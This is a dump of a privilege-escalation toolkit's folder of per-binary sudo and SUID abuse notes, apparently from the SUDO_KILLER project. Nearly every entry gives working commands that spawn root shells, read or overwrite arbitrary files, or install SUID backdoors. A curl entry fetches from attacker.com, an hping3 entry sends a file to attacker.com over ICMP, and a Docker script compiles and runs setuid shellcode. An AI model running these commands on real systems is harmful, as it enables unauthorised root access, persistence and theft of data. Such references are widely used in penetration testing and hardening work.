localhost: 7 | * The whole directory structure is copied to $TF. 8 | LFILE=file_to_read 9 | TF=$(mktemp -d) 10 | echo "$LFILE" | sudo cpio -R $UID -dp $TF 11 | cat "$TF/$LFILE" 12 | * Copies $LFILE to the $LDIR directory. 13 | LFILE=file_to_write 14 | LDIR=where_to_write 15 | echo DATA >$LFILE 16 | echo $LFILE | sudo cpio -R 0:0 -p $LDIR 17 | -------------------------------------------------------------------------------- /dbins/cpulimit.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo cpulimit -l 100 -f /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/crash.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo crash -h 8 | !sh 9 | -------------------------------------------------------------------------------- /dbins/crontab.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The commands are executed according to the crontab file edited via the 6 | crontab utility. 7 | sudo crontab -e 8 | -------------------------------------------------------------------------------- /dbins/csh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo csh 6 | -------------------------------------------------------------------------------- /dbins/csplit.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | csplit $LFILE 1 7 | cat xx01 8 | -------------------------------------------------------------------------------- /dbins/csvtool.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo csvtool call '/bin/sh;false' /etc/passwd 6 | -------------------------------------------------------------------------------- /dbins/cupsfilter.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo cupsfilter -i application/octet-stream -m application/octet-stream 7 | $LFILE 8 | -------------------------------------------------------------------------------- /dbins/curl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Fetch a remote file via HTTP GET request. 6 | URL=http://attacker.com/file_to_get 7 | LFILE=file_to_save 8 | sudo curl $URL -o $LFILE 9 | -------------------------------------------------------------------------------- /dbins/cut.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo cut -d "" -f1 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/dash.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo dash 6 | -------------------------------------------------------------------------------- /dbins/date.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo date -f $LFILE 7 | -------------------------------------------------------------------------------- /dbins/dc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo dc -e '!/bin/sh' 6 | -------------------------------------------------------------------------------- /dbins/dd.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | echo "data" | sudo dd of=$LFILE 7 | -------------------------------------------------------------------------------- /dbins/debugfs.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo debugfs 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/dialog.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo dialog --textbox "$LFILE" 0 0 7 | -------------------------------------------------------------------------------- /dbins/diff.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo diff --line-format=%L /dev/null $LFILE 7 | -------------------------------------------------------------------------------- /dbins/dig.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo dig -f $LFILE 7 | -------------------------------------------------------------------------------- /dbins/distcc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo distcc /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/dmesg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo dmesg -H 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/dmidecode.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * It can be used to overwrite files using a specially crafted SMBIOS file 6 | that can be read as a memory device by dmidecode. Generate the file with 7 | dmiwrite and upload it to the target. 8 | o --dump-bin, will cause dmidecode to write the payload to the 9 | destination specified, prepended with 32 null bytes. 10 | o --no-sysfs, if the target system is using an older version of 11 | dmidecode, you may need to omit the option. 12 | make dmiwrite 13 | TF=$(mktemp) 14 | echo "DATA" > $TF 15 | ./dmiwrite $TF x.dmi 16 | LFILE=file_to_write 17 | sudo dmidecode --no-sysfs -d x.dmi --dump-bin "$LFILE" 18 | -------------------------------------------------------------------------------- /dbins/dmsetup.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo dmsetup create base < $TF/x.sh 9 | fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF 10 | sudo dnf install -y x-1.0-1.noarch.rpm 11 | -------------------------------------------------------------------------------- /dbins/docker.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The resulting is a root shell. 6 | sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh 7 | -------------------------------------------------------------------------------- /dbins/docker_exp.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # SUDO Docker Privilege Escalation 4 | # https://github.com/pyperanger/dockerevil 5 | 6 | # SELINUX "bypass" using :z option 7 | # https://docs.docker.com/engine/admin/volumes/bind-mounts/#configure-the-selinux-label 8 | 9 | 10 | echo "[*] SUDO Docker Privilege Escalation"; 11 | 12 | echo "[+] Writing shellcode"; 13 | 14 | cat > /tmp/sud0-d0ck3r.c <<'EOF' 15 | 16 | #include 17 | #include 18 | 19 | unsigned char shellcode[] = \ 20 | "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"; 21 | int main() 22 | { 23 | setgid(0); 24 | setuid(0); 25 | int (*ret)() = (int(*)())shellcode; 26 | ret(); 27 | } 28 | 29 | EOF 30 | 31 | echo "[+] Compiling shellcode in container"; 32 | 33 | sudo docker run -t -v /tmp/:/tmp/:z pype/ubuntu_gcc /bin/sh -c 'gcc -fno-stack-protector -z execstack /tmp/sud0-d0ck3r.c -o /tmp/sud0-d0ck3r && chmod +xs /tmp/sud0-d0ck3r' 34 | 35 | echo "[+] r00t sh3ll !"; 36 | /tmp/sud0-d0ck3r 37 | -------------------------------------------------------------------------------- /dbins/dos2unix.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/dos2unix.txt -------------------------------------------------------------------------------- /dbins/dosbox.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Note that the name of the written file in the following example will be 6 | FILE_TO_. Also note that echo terminates the string with a DOS-style line 7 | terminator (\r\n), if that’s a problem and your scenario allows it, you 8 | can create the file outside dosbox, then use copy to do the actual write. 9 | LFILE='\path\to\file_to_write' 10 | sudo dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit 11 | -------------------------------------------------------------------------------- /dbins/dotnet.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo dotnet fsi 6 | System.Diagnostics.Process.Start("/bin/sh").WaitForExit();; 7 | -------------------------------------------------------------------------------- /dbins/dpkg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo dpkg -l 8 | !/bin/sh 9 | * It runs an interactive shell using a specially crafted Debian package. 10 | Generate it with fpm and upload it to the target. 11 | TF=$(mktemp -d) 12 | echo 'exec /bin/sh' > $TF/x.sh 13 | fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF 14 | sudo dpkg -i x_1.0_all.deb 15 | -------------------------------------------------------------------------------- /dbins/dstat.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * echo 'import os; os.execv("/bin/sh", ["sh"])' >/usr/local/share/dstat/ 6 | dstat_xxx.py 7 | sudo dstat --xxx 8 | -------------------------------------------------------------------------------- /dbins/dvips.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * tex '\special{psfile="`/bin/sh 1>&0"}\end' 6 | sudo dvips -R0 texput.dvi 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which dvips) . 17 | 18 | tex '\special{psfile="`/bin/sh 1>&0"}\end' 19 | ./dvips -R0 texput.dvi 20 | -------------------------------------------------------------------------------- /dbins/easy_install.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$ 7 | (tty)')" > $TF/setup.py 8 | sudo easy_install $TF 9 | -------------------------------------------------------------------------------- /dbins/eb.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo eb logs 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/ed.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ed 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which ed) . 17 | 18 | ./ed 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/efax.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo efax -d "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/elvish.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo elvish 6 | -------------------------------------------------------------------------------- /dbins/emacs.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo emacs -Q -nw --eval '(term "/bin/sh")' 6 | -------------------------------------------------------------------------------- /dbins/env.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo env /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/eqn.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo eqn "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/espeak.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo espeak -qXf "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/ex.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ex 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/exiftool.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | INPUT=input_file 7 | sudo exiftool -filename=$LFILE $INPUT 8 | -------------------------------------------------------------------------------- /dbins/expand.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo expand "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/expect.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo expect -c 'spawn /bin/sh;interact' 6 | -------------------------------------------------------------------------------- /dbins/facter.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | echo 'exec("/bin/sh")' > $TF/x.rb 7 | sudo FACTERLIB=$TF facter 8 | -------------------------------------------------------------------------------- /dbins/file.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Each input line is treated as a filename for the file command and the 6 | output is corrupted by a suffix : followed by the result or the error of 7 | the operation, so this may not be suitable for binary files. 8 | LFILE=file_to_read 9 | sudo file -f $LFILE 10 | -------------------------------------------------------------------------------- /dbins/find.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo find . -exec /bin/sh \; -quit 6 | -------------------------------------------------------------------------------- /dbins/finger.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/finger.txt -------------------------------------------------------------------------------- /dbins/fish.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo fish 6 | -------------------------------------------------------------------------------- /dbins/flask.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | echo 'import pty; pty.spawn("/bin/bash")' > flask.py 6 | export FLASK_APP=flask.py 7 | sudo /usr/bin/flask run 8 | -------------------------------------------------------------------------------- /dbins/flock.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo flock -u / /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/fmt.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This corrupts the output by wrapping very long lines at the given width. 6 | LFILE=file_to_read 7 | sudo fmt -999 "$LFILE" 8 | -------------------------------------------------------------------------------- /dbins/fold.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo fold -w99999999 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/fping.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo fping -f $LFILE 7 | -------------------------------------------------------------------------------- /dbins/ftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ftp 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/gawk.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo gawk 'BEGIN {system("/bin/sh")}' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which gawk) . 16 | 17 | ./gawk 'BEGIN {system("/bin/sh")}' 18 | -------------------------------------------------------------------------------- /dbins/gcc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo gcc -wrapper /bin/sh,-s . 6 | -------------------------------------------------------------------------------- /dbins/gcloud.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo gcloud help 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/gcore.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo gcore $PID 6 | -------------------------------------------------------------------------------- /dbins/gdb.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo gdb -nx -ex '!sh' -ex quit 6 | ***** Capabilities ***** 7 | If the binary has the Linux CAP_SETUID capability set or it is executed by 8 | another binary with the capability set, it can be used as a backdoor to 9 | maintain privileged access by manipulating its own process UID. 10 | * This requires that GDB is compiled with Python support. 11 | cp $(which gdb) . 12 | sudo setcap cap_setuid+ep gdb 13 | 14 | ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit 15 | -------------------------------------------------------------------------------- /dbins/gem.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This requires the name of an installed gem to be provided (rdoc is 6 | usually installed). 7 | sudo gem open -e "/bin/sh -c /bin/sh" rdoc 8 | -------------------------------------------------------------------------------- /dbins/genie.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo genie -c '/bin/sh' 6 | -------------------------------------------------------------------------------- /dbins/genisoimage.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo genisoimage -q -o - "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/ghc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ghc -e 'System.Process.callCommand "/bin/sh"' 6 | -------------------------------------------------------------------------------- /dbins/ghci.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ghci 6 | System.Process.callCommand "/bin/sh" 7 | -------------------------------------------------------------------------------- /dbins/gimp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; 6 | os.system("sh")' 7 | -------------------------------------------------------------------------------- /dbins/ginsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ginsh 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which ginsh) . 17 | 18 | ./ginsh 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/grc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo grc --pty /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/grep.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo grep '' $LFILE 7 | -------------------------------------------------------------------------------- /dbins/gtester.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo '#!/bin/sh' > $TF 7 | echo 'exec /bin/sh 0<&1' >> $TF 8 | chmod +x $TF 9 | sudo gtester -q $TF 10 | -------------------------------------------------------------------------------- /dbins/gzip.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo gzip -f $LFILE -t 7 | -------------------------------------------------------------------------------- /dbins/hd.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo hd "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/head.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo head -c1G "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/hexdump.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo hexdump -C "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/highlight.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo highlight --no-doc --failsafe "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/hping3.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo hping3 6 | /bin/sh 7 | * The file is continuously sent, adjust the --count parameter or kill the 8 | sender when done. Receive on the attacker box with: 9 | sudo hping3 --icmp --listen xxx --dump 10 | RHOST=attacker.com 11 | LFILE=file_to_read 12 | sudo hping3 "$RHOST" --icmp --data 500 --sign xxx --file "$LFILE" 13 | -------------------------------------------------------------------------------- /dbins/iconv.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | ./iconv -f 8859_1 -t 8859_1 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/iftop.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo iftop 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with 